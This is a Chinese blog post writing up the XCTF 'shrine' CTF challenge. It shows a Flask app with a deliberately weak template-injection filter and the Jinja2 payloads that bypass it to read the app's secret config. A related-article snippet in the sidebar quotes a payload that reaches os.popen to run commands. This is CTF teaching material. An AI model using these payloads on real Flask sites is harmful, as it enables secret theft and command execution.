【XCTF 攻防世界】WEB 高手进阶区 shrine(ssti,待补充)

最新推荐文章于 2024-02-09 18:31:34 发布
最新推荐文章于 2024-02-09 18:31:34 发布
阅读量815 收藏 2
点赞数 2
分类专栏: CTF刷题 WEB 文章标签: python flask ssti 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45844670/article/details/108338243
版权

关于ssti的详解:
(url先空着,正在写)

打开页面就是一段源码,右键查看下源码

import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
//注册了一个名为FLAG的config,猜测这就是flag,
如果没有过滤可以直接{{config}}即可查看所有app.config内容,
但是这题设了黑名单[‘config’,‘self’]并且过滤了括号

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
		//上面这行代码把黑名单的东西遍历并设为空
    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

明显是个 flask 在 /shrine/ 下的 SSTI

而且对 payload 进行了过滤:对小括号进行了替换,将 ( 和 ) 替换为空字符串
将 config 和 self 添加进了黑名单

首先在shrine路径下测试ssti能正常执行
/shrine/{{ 1+1 }}
在这里插入图片描述
python还有一些内置函数,比如url_for和get_flashed_messages
/shrine/{{url_for.__globals__}}
在这里插入图片描述

看到current_app意思应该是当前app,那我们就当前app下的config:
/shrine/{{url_for.__globals__['current_app'].config}}
在这里插入图片描述

另一个可以利用的函数
get_flashed_messages

返回之前在Flask中通过 flash() 传入的闪现信息列表。把字符串对象表示的消息加入到一个消息队列中,然后通过调用 get_flashed_messages() 方法取出(闪现信息只能取出一次,取出后闪现信息会被清空)。

/shrine/{{get_flashed_messages.__globals__['current_app'].config}}
或者直接取出
/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}
得到flag

Kal1
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
攻防世界】十七 --- shrine --- SSTI
qq_43168364的博客
12-28 439
题目 — shrine 一、writeup 二、知识点
xctf攻防世界 MISC高手 flag_universe
l8947943的博客
01-17 6657
1. 入环境,下载附件 下载后,给的是pcapng文件,果断使用wireshark打开,在其中搜索关键词flag,发现如下: 2. 问题分析 追踪流 可以看到,采用的ftp协议,对文件flag.txt、new_uniberse.png和universe.png文件行了上传,因此,解题关键是把上传的图片给还原出来。 找到new_uniberse.png 如图: 把找到的上传图片追踪流导出来,在这里推荐使用工具用NetworkMiner打开流量包,他妈的电脑安装后缺少什么dll文件,人麻了,手
xctf攻防世界easysql wp
sash1mi
02-20 1843
xctf攻防世界easysql wp 考察知识点: SQL注入 二次注入 python脚本 访问题目地址 有注册和登录两个功能 经测试发现该题目存在二次注入 https://www.jianshu.com/p/3fe7904683ac username:'k3vin"/ password:k3vin email:k3vin 注册成功后有一个修改密码的页面 修改密码,报如下错误 猜测并构造payload: 1"||extractvalue(1,concat(0x7e,(select(database
XCTF攻防世界web新手练习_ 6_xff_referer
silence1_的博客
04-28 1万+
XCTF攻防世界web新手练习—disabled_button 题目 题目为xff_referer,描述信息 根据描述信息,知道题目应该与xff和referer相关 入题目,看到 于是用brup抓包,在http头加一条X-Forwarded-For: 123.123.123.123 发送请求 在响应中看到必须来自谷歌 于是再次增加一条Referer: https://www.google.c...
xctf攻防世界-web:view_source
weixin_46168073的博客
11-19 2224
一、首先解析题目。 已知查看网页源码有3种操作: 1.鼠标右键 2.F12 3.在url中提交view-source:http://111.200.241.244:58180 在线获取场景。 点击链接后入。 可以看到鼠标右键是点击不了的。 二、做题 说实话,我们直接F12看不香嘛? 然后找到flag 复制记事本,然后提交。 ...
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
XCTF-RE】新手练习-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-Mobile】新手练习-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习-re1.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ugg9gy
SSTI模板注入-中括号、args、单双引号被过滤绕过(ctfshow web入门365)
T1ngSh0w的博客
03-28 1650
SSTI模板注入漏洞——中括号、单双引号、args被过滤。 ctfshow web入门365
SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号、数字被过滤绕过(ctfshow web入门370)
T1ngSh0w的博客
03-30 1374
ctfshow web入门370 中括号、args、request、下划线、引号、花括号、数字、os被过滤 SSTI模板注入漏洞
CTF竞赛介绍及刷题网址更新---2020.08
热门推荐
第七宇林的博客
08-15 1万+
CTF(夺旗赛) ---网络安全技术比赛的介绍 及 CTF常用的在线刷题网站:RedTigers-Hackit、XCTF(攻防世界)竞赛平台、网络信息安全攻防学习平台、OWASP 中国、实验吧CTF训练营、全国大学生信息安全竞赛官方网站、MS09067WEB靶场、合天网安实验室、封神台、SQL Fiddle、 BUUCTF、CTFHUB...
ssti
2h4ox1n9
05-23 916
[第三章 web]SSTI {{"".__class__.__bases__[0].__subclasses__()}} 执行结果中找到 os命令执行类<class 'os._wrap_close'>从头开始复制到os那里,粘贴到word文档里搜索个128结果,下标127 {{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}} 列目录 ...
攻防世界web解题[](五)
weixin_46703850的博客
03-10 461
攻防世界web解题[](五) 介绍:记录解题过程 15.Web_python_template_injection(python 模板注入) 16.Web_php_unserialize( php 反序列) 17.easytornado 18.shrine(flask模板注入)
XCTF-攻防世界CTF平台-Web类——16、shrine(Flask框架之Jinja2模板渲染引擎、查看app.config[‘FLAG‘])
Onlyone_1314的博客
12-11 1603
目录标题python模板注入代码分析:构造Python模板注入url_for()函数查看flagget_flashed_messages()函数查看flag 打开题目地址: 这是Python的flask渲染模板 python模板注入 python模板注入漏洞的产生在于Flask应用框架中render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,而且Flask模板中使用了Jinja2作为模板渲染引擎,{{}}在Jinja2中作为变量包裹标识符,在渲染的时候将{{}}包裹的内
【BUUCTF N1BOOK】[第三章 web] 通关
最新发布
人若无名,便可专心练剑
02-09 1212
N1BOOK是Nu1L Team为方便读者打造的免费平台,读者可在上面享受书籍相关资源以及查阅勘误。
[XCTF] web shrine
0of_blog
05-22 226
打开靶场,一眼看,是个flask框架,shrine函数接受了一个shrine参数交给flask的模板渲染器, import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<pat...
XCTF shrine wp
Lakers248_的博客
05-12 262
XCTF shrine wp
攻防世界traffic
07-28
很抱歉,我无法理解你的问题。请提供更多的上下文或明确的问题,以便我能够帮助你。 #### 引用[.reference_title] - *1* *2* [xctf攻防世界 Web高手 easytornado](https://blog.csdn.net/l8947943/article/details/126174257)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [攻防世界1](https://blog.csdn.net/charon145/article/details/121129480)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值